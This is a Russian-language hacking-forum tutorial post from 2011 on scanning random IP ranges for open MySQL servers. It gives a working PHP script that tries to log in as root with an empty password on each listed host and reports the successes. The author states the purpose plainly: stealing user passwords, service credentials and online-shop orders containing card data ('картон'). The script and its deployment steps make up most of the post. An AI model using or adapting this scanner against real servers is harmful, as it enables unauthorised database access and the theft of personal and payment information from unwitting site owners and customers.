Логин: Пароль: Забыли пароль? Регистрация
Рекламный блок

              

Страница 1 из 11
Форум » FOR WEB-MASTER`S » Учебник » Пишем сканер MySQL
Пишем сканер MySQL
cookДата: Пятница, 11.02.2011, 11:59 | Сообщение # 1

Уникальный Человек
Репутация: 1004
Сообщений: 1056
Награды: 3
Статус:
Базы данных - как много в этой фразе для сердца... кардера/хакера слилось. =) Итак что есть БД? Базы данных
вещь весьма и весьма полезная. В базе могут быть все настройки форумов, движков и прочее... прочее...
прочее... но что самое интересное и полезное в базе могут находится пароли юзеров, логины и пароли к
всевозможным сервисам и главное если сервер является онлайн-шопом в базе можно найти заказы и
соответственно инфу о картоне =) Значит нам просто необходимо поиметь пару, тройку баз данных и всё будет
шоколадно =)

Именно такие мысли посетили меня когда я однажды вечером утюжил сеть. Особенных дел у меня в тот момент не
было и я решил что было бы неплохо немного посканить серваки на открытый 3306 порт. Для тех кто в танке: на
3306 порту по дефолту висит демон MySQL. Запустил сканер портов, я пользуюсь SuperScan так он имхо наиболее
быстрый и удобный, ввёл диапазон от балды и жмахнул по кнопарю старт =) Сканер немного попыхтел и выдал
результат, теперь у меня было около 250 адресов на которых был открыт скульный порт. Осталось дело за
малым, как всем наверно известно в MySQL по дефолту идёт юзер root без пароля, значит мне осталось лишь
попробовать подключится к каждому из этих серверов и попробовать авторизоваться под рутом без пароля.
Перспектива в ручную подключаться к каждому серверу меня что-то не вдохновляла. Порыскав немного по инету в
надежде найти прогу которая автоматизировала-бы эти действия я жестоко обломался, найти такую прогу мне не
удалось. Значит придётся написать самому. Дабы вы не заморачивались с данным действием я и привожу в этой
статье сорсы данной софтины... точнее скрипта. Писал на пхп так как этот язык мне наиболее близок и
симпатичен, да и работа с скулём через пхп достаточно проста.
<?
set_time_limit(0);
# берём список серверов для сканирования из файла servers.dat
$servers=file("servers.dat");
# получаем кол-во записей в файле
$strings=count($servers);
for($i=0; $i<$strings; $i++){
$server=$servers[$i];
# функция коннекта к базе, передаем переменную $server
connect($server);
}
function connect($server)
# а вот и сама функция подключения
{
# коннект к базе (сервер,"логин","пароль")
$co=mysql_connect($server,"root","");
# если подключится не удалось
if(!($co))
{
echo "connect 2 server $server failed<br>";
}
# если подключились то выводим сообщение
else
{
echo "connect 2 server $server success<br>";
}
}
?>
Теперь обзываем этот скрипт sqlbrute.php и закидываем на сервак. После этого создаём файл servers.dat со
списком адресов для сканирования и также аплоадим на сервер. После всего этого в браузере набиваем:
www.ваш_сайт.ru/sqlbrute.php и получаем отчёт =)
Возможно некоторые станут говорить что мол только лохи оставляют пустые пароли на базу данных и мол таких
дебильных админов найти невозможно, но я основываясь на своём опыте могу вам сказать что таких админов
достаточно много и кто ищет тот всегда найдёт.
Ну вот и всё. Хорошего вам коннекта, пухлых баз данных и гигабайтов ценной инфы.
Удачи.
Автор: 1dt.w0lf

 
Форум » FOR WEB-MASTER`S » Учебник » Пишем сканер MySQL
Страница 1 из 11
Поиск:


Статистика форума Zorend.ru
Последние темы Популярные темы Лучшие пользователи Новые пользователи Звезды ZOREND`a
Глобальное обновление
Пара Анекдотов
Правила раздела
Считаем до 1000
Какая видео карта сейчас нормальная?
WebThumb 2.0 - Обмен посетителями на ваш сайт
халявные Icq налетай!
Аву плиз
 Считаем до 1000
 Конкурс "Уникальный человек"
 Участники конкурса "Уникальный человек"
 Играем в города :)
 Ваш аппарат
 Жалобы на участников конкурса "Уникальный человек"
 Зимняя шапка.
 Смайлики
Timoha - (Сообщений: 1091)
cook - (Сообщений: 1056)
pikus - (Сообщений: 1012)
Adrianoosem - (Сообщений: 419)
n1ceman - (Сообщений: 319)
b0ot - (Сообщений: 313)
sg-ua - (Сообщений: 250)
Аватар - (Сообщений: 250)
Alisasslom - (Зарегистрирован: 20.07.2015)
donkj4 - (Зарегистрирован: 20.07.2015)
meroslEr - (Зарегистрирован: 20.07.2015)
MelvinRat - (Зарегистрирован: 20.07.2015)
randiew16 - (Зарегистрирован: 20.07.2015)
ArthurGers - (Зарегистрирован: 20.07.2015)
CharlesCida - (Зарегистрирован: 20.07.2015)
guydd11 - (Зарегистрирован: 20.07.2015)
friendgog - (Репутация: 1187)
cook - (Репутация: 1004)
b0ot - (Репутация: 500)
pikus - (Репутация: 201)
Вадим - (Репутация: 102)
Timoha - (Репутация: 7)
-Wicked - (Репутация: 5)
plan - (Репутация: 5)